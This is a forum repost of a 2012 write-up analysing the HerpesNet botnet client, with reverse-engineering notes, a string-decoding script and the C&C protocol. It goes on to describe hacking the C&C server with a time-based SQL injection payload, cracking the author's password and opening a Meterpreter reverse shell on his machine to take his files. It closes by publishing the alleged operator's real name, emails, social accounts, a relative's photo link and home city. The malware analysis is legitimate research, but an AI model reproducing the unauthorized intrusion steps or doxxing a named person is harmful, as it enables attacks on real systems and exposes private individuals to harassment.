Nytro Posted July 26, 2012 Report Posted July 26, 2012 [h=1]Analysis & pownage of herpesnet botnet[/h]Analysis & pownage of herpesnet botnetIntroductionToolsStatic analysisC&C contactPown the C&CPown the C&C - part 2C&C interfaceBotnet owner tracing [h=2]Introduction[/h]We received a new sample from our submit mecanism. This sample is a botnet HTTP client called HerpesNet. The md5 of the sample is db6779d497cb5e22697106e26eebfaa8. We started the analysis when we found a way to manage the command & control... [h=2]Tools[/h]IDA 5.0 free The idb of file are available: (db6779d497cb5e22697106e26eebfaa8.idb).sqlmap.your favorite browser[h=2]Static analysis[/h]We start by opening the binary with IDA. We see directly that the file is not packed. We follow the Win_Main function and at offset 004071E0h we can see a call on 004070E0h (initThread) The initTread function are in charge to decode strings, open a mutex with the name "rffggghooo" and run 3 threads 004034F5h (thrInstallReg) with the parameter at offset 0041CE88h ("tcerfhygy") is in charge to loops indefinitly and set the the regkey 'Software\Microsoft\Windows\CurrentVersion\Run' with the name "rffggghooo" to enable the boot persistance (it does that every 100ms)00402F70h (thrKeylogger) that in charge of set the keyboard hook with the help of GetAsyncKeyState00406AF0h (thrContactCC) that in charge to loads system informations and check the C&C every 15s[h=3]Decode strings[/h]00406FC0h (initVariable) is in charge to decode all obsfucated string 00403034h (decode) is in charge to decode strings we do a python script to recover all strings #!/usr/bin/env pythonimport sysdef decode(src): r = "" for c in src: c = ord(c) if c < 0x61 or c > 0x7a : if c < 0x41 or c > 0x5a: r += chr(c) continue x = (( c - 0x41 ) % 0x1a) + 0x41 else: x = ((c - 0x54) % 0x1a) + 0x61 r += chr(x) return rdef main(): if len(sys.argv) != 2: sys.exit(1) f = open(sys.argv[1], 'rb') f.seek(0x1ae88, 0) data = f.read(0x32f) for d in data.split("\0"): if len(d) == 0: continue print "%s : %s" % (d, decode(d))if __name__ == "__main__": main()y0ug@malware.lu:~/malware/herpes$ python decode-all.py db6779d497cb5e22697106e26eebfaa8tcerfhygy : gpresultl3.0 : 3.0uggc://qq.mrebkpbqr.arg/urecarg/ : http://dd.zeroxcode.net/herpnet/74978o6rpp6p19836n17n3p2pq0840o0 : 74978b6ecc6c19836a17a3c2cd0840b0uggc://jjj.mrebkpbqr.arg/urecarg/ : http://www.zeroxcode.net/herpnet/sgc.mrebkpbqr.arg : ftp.zeroxcode.netuggc://sex7.zvar.ah/urecarg/ : http://frk7.mine.nu/herpnet/hcybnq@mrebkpbqr.arg : upload@zeroxcode.nethccvg : uppitujsdsdbbngfgjhhuugfgfujd : hwfqfqooatstwuuhhtstshwqrffggghooo : esstttubbbAshfurncsmx : Afusheapfzk[h=2]C&C contact[/h]The function in charge to build the request when it checks the C&C is 004059E0h (buildRerqd) It build the POST data with the information obtained above to make something like that: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724After that it concat the url adding "run.php" add the end of the url passed in parameter 00403E57h are in charge to do the http request. By the way it set the useragent with the value 74978b6ecc6c19836a17a3c2cd0840b0 (is the deofuscated value) After it mades the request it call 00405F80h (parseCommand) that manages to execute command received from the C&C (I'm not going to detail command here you can look directly in the idb) Another interesting function is 0040391Fh (fileUpload) thats upload files by POST methods with the variable name "upfile" can be played directly with curl y0ug@malware.lu:~/malware/herpes$ curl -F upfile=@test.jpg -A 74978b6ecc6c19836a17a3c2cd0840b0 zeroxcode.netFile caricato correttamente[h=2]Pown the C&C[/h]We are curious about how the C&C are coded so we decide to test some injection SQL on the C&C api especially the zeroxcode.net. With sqlmap we manage to exploit a time-based sqli. Place: POSTParameter: id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724' AND SLEEP(5) AND 'PtaQ'='PtaQ---[08:22:41] [iNFO] the back-end DBMS is MySQLweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10back-end DBMS: MySQL 5.0.11We extract tables names from the database Database: herpnet[7 tables]+----------+| clients || clinfo || commands || htickets || husers || paypalt || uploads |+----------+And tada we get the user credential of the malware author +--------------------------------------------+|id|username|password ||--------------------------------------------|| 1| Frk7|6e6bc4e49dd477ebc98ef4046c067b5f|+--------------------------------------------+With google we get the password 6e6bc4e49dd477ebc98ef4046c067b5f:ciaoThat is a master crime genious password We found a path disclosure that can be trigger with curl for exemple y0ug@malware.lu:~/malware/herpes$ curl zeroxcode.net<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL C:\inetpub\zeroxcode\herpnet\run.php/ was not found on this server.</p><hr><address> Server at zeroxcode.net Port 80</address></body></html>[h=2]Pown the C&C - part 2[/h]We saw that the developer use a machine called Frk7Test@FRK7TEST-D6E0BD. So we upload a meterpreter to have a shell on the machine (whith the feature provide by Frk7 himself).msf exploit(handler) > exploit[* ]Started reverse handler on [*] Starting the payload handler...[*] Sending stage (752128 bytes) to[*] Meterpreter session 1 opened ( -> at Mon May 21 16:20:04 +0200 2012meterpreter > screenshotScreenshot saved to: /home/y0ug/src/msf3/PtPVDrKD.jpegmeterpreter > sysinfo System Language : it_ITOS : Windows XP (Build 2600, Service Pack3).Computer : FRK7TEST-D6E0BD Architecture : x86 Meterpreter : x86/win32 meterpreter >meterpreter > ls Listing: C:\Documents and Settings\Frk7Test\Desktop\Herpes4Un =============================================================Mode Size Type Last modified Name---- ---- ---- ------------- ----40777/rwxrwxrwx 0 dir Mon May 21 15:26:37 +0200 2012 .40777/rwxrwxrwx 0 dir Mon May 21 15:37:07 +0200 2012 ..40777/rwxrwxrwx 0 dir Mon May 21 14:53:32 +0200 2012 Debug40777/rwxrwxrwx 0 dir Mon May 21 16:06:41 +0200 2012 Herpes100666/rw-rw-rw- 890 fil Mon May 07 20:42:22 +0200 2012 Herpes.sln100666/rw-rw-rw- 167424 fil Mon May 21 16:14:06 +0200 2012 Herpes.suo40777/rwxrwxrwx 0 dir Mon May 21 16:15:12 +0200 2012 Release100777/rwxrwxrwx 134 fil Mon May 07 20:42:12 +0200 2012 clean.bat100666/rw-rw-rw- 134 fil Mon May 07 20:42:22 +0200 2012 roba da fare.txtmeterpreter > download -r Herpes ./[*] downloading: Herpes\antidebug.h -> .//antidebug.h[*] downloaded : Herpes\antidebug.h -> .//antidebug.h[*] mirroring : Herpes\base64 -> .//base64[*] downloading: Herpes\base64\base64.c -> .//base64/base64.c[*] downloaded : Herpes\base64\base64.c -> .//base64/base64.c[*] downloading: Herpes\base64\base64.h -> .//base64/base64.h[*] downloaded : Herpes\base64\base64.h -> .//base64/base64.h[*] mirrored : Herpes\base64 -> .//base64[*] mirroring : Herpes\cadt -> .//cadt[*] downloading: Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib[*] downloaded : Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib[*] downloading: Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h[*] downloaded : Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h...The part of file that we are able to download before frk7 shutdown his machine (and web site) here. And a screenshot of the machine: [h=2]C&C interface[/h]First the login page: Secondly, the panel page (connected with frk7 account - see on left-top): The tasks page: List of command available: Information about an infected machine (in this case the test machine of frk7 - yes we see you!!) [h=2]Botnet owner tracing[/h]We made some research to understand who manage this botnet. First his pseudo: frk7 or siliceous Secondly his real name: Francesco Pompo We identified several mail: frk7@live.itfrk7@live.comfrancesco.pompo@gmail.comsiliceous@live.comSkype account: nobbosterminatorFacebook page: http://www.facebook.com/Frk7.face Picasa page: https://picasaweb.google.com/101402927290625732642/ProfilePhotos His girlfriend: https://picasaweb.google.com/101402927290625732642/ProfilePhotos#5654185571837906082 Twitter account: https://twitter.com/#!/frk7tweet Another repository: http://frk7.altervista.org/ And finaly, he lives in Trapani (Italia). It amazing that a botnet manager puts as much information about his private life !! It's so crazy that we wonder if this botnet is not a honeypot of the Italian police !! Sursa: en_analyse_herpnet - malware-lu - Malware.lu technical analysis - Google Project Hosting Quote
romanul Posted July 26, 2012 Report Posted July 26, 2012 Jesus. Si is multi care fac asa.. doamne Quote